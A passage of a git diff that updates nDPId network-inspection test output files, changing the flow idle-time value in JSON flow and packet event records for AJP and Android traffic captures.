+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584447,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":26,"total-skipped-flows":0,"total-l4-data-len":2594,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":39,"global_ts_msec":1505154584618} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 38/26 
diff --git a/test/results/alexa-app.pcapng.out b/test/results/alexa-app.pcapng.out
index dfb9b879e..e45caae99 100644
--- a/test/results/alexa-app.pcapng.out
+++ b/test/results/alexa-app.pcapng.out
@@ -33,11 +33,11 @@ 00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024847,"flow_last_seen":1490976024847,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1490976024848,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1490976024848,"pkt":"ePiC0\/vCAMDKkaPvCABFAABbz+1AAEARvaqsECoBrBAq2AA12UMAR0w654SBgAABAAEAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2FuZHJvaWQDY29tAAABAAHADAABAAEAAAEYAASs2QmO"} 00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976024847,"flow_last_seen":1490976024848,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976024848,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": 
{"query":"connectivitycheck.android.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.9.142"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024857,"flow_last_seen":1490976024857,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976024857,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1490976024857,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976024857,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8rxxAAEAG\/k+sECrYrNkJjutWAFC1gOcZAAAAAKAC\/\/\/pcgAAAgQFtAQCCAoA9kgFAAAAAAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1490976024894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976024894,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8rv4AADQGSm6s2QmOrBAq2ABQ61bhGRrktYDnGqASpajwtAAAAgQFZAQCCApVvgGZAPZIBQEDAwc="} 
-00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1490976024896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976024896,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0rx1AAEAG\/lasECrYrNkJjutWAFC1gOca4Rka5YAQAVfDfgAAAQEICgD2SAlVvgGZ"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976024857,"flow_last_seen":1490976024899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024899,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024857,"flow_last_seen":1490976024857,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976024857,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1490976024857,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976024857,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8rxxAAEAG\/k+sECrYrNkJjutWAFC1gOcZAAAAAKAC\/\/\/pcgAAAgQFtAQCCAoA9kgFAAAAAAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1490976024894,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976024894,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8rv4AADQGSm6s2QmOrBAq2ABQ61bhGRrktYDnGqASpajwtAAAAgQFZAQCCApVvgGZAPZIBQEDAwc="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1490976024896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976024896,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0rx1AAEAG\/lasECrYrNkJjutWAFC1gOca4Rka5YAQAVfDfgAAAQEICgD2SAlVvgGZ"} 
+00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976024857,"flow_last_seen":1490976024899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024899,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027514,"flow_last_seen":1490976027514,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976027514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1490976027514,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976027514,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WktAAEARM2qsECrYrBAqAc\/EADUAKrjvz8MBAAABAAAAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAQ=="} 
00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027514,"flow_last_seen":1490976027514,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976027514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -48,23 +48,23 @@ 00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027522,"flow_last_seen":1490976027523,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976027523,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.218.196"}} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1490976027560,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1490976027560,"pkt":"ePiC0\/vCAMDKkaPvCABFAABr0NVAAEARvLKsECoBrBAq2AA1z8QAV0oUz8OBgAABAAIAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAcAMAAUAAQABUX8AEQxtb2JpbGUtZ3RhbGsBbMASwC4AAQABAAABKwAErcLfvA=="} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027514,"flow_last_seen":1490976027560,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976027560,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.223.188"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027567,"flow_last_seen":1490976027567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976027567,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1490976027567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027567,"pkt":"AMDKkaPvePiC0\/vCCABFAAA81nRAAEAG\/9+sECrYrcLfvKd+FGxeQZ9gAAAAAKAC\/\/\/gAAAAAgQFtAQCCAoA9kkUAAAAAAEDAwg="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1490976027617,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027617,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA86FEAACsGQwOtwt+8rBAq2BRsp36O4XTVXkGfYaASpajFDgAAAgQFZAQCCAor\/EXWAPZJFAEDAwc="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1490976027621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976027621,"pkt":"AMDKkaPvePiC0\/vCCABFAAA01nVAAEAG\/+asECrYrcLfvKd+FGxeQZ9hjuF01oAQAVeX1wAAAQEICgD2SRkr\/EXW"} -01104{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027567,"flow_last_seen":1490976027625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976027625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01166{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976027567,"flow_last_seen":1490976027674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1490976027674,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027567,"flow_last_seen":1490976027567,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976027567,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1490976027567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027567,"pkt":"AMDKkaPvePiC0\/vCCABFAAA81nRAAEAG\/9+sECrYrcLfvKd+FGxeQZ9gAAAAAKAC\/\/\/gAAAAAgQFtAQCCAoA9kkUAAAAAAEDAwg="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1490976027617,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027617,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA86FEAACsGQwOtwt+8rBAq2BRsp36O4XTVXkGfYaASpajFDgAAAgQFZAQCCAor\/EXWAPZJFAEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1490976027621,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976027621,"pkt":"AMDKkaPvePiC0\/vCCABFAAA01nVAAEAG\/+asECrYrcLfvKd+FGxeQZ9hjuF01oAQAVeX1wAAAQEICgD2SRkr\/EXW"} 
+01104{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027567,"flow_last_seen":1490976027625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976027625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01166{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976027567,"flow_last_seen":1490976027674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1490976027674,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027724,"flow_last_seen":1490976027724,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976027724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1490976027724,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027724,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Wk1AAEARM2qsECrYrBAqASjeADUAKB2sfT0BAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="} 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027724,"flow_last_seen":1490976027724,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976027724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1490976027725,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1490976027725,"pkt":"ePiC0\/vCAMDKkaPvCABFAABM0NhAAEARvM6sECoBrBAq2AA1KN4AOCjyfT2BgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAAEGAATYOtrE"} 00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":39,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027724,"flow_last_seen":1490976027725,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976027725,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.218.196"}} 
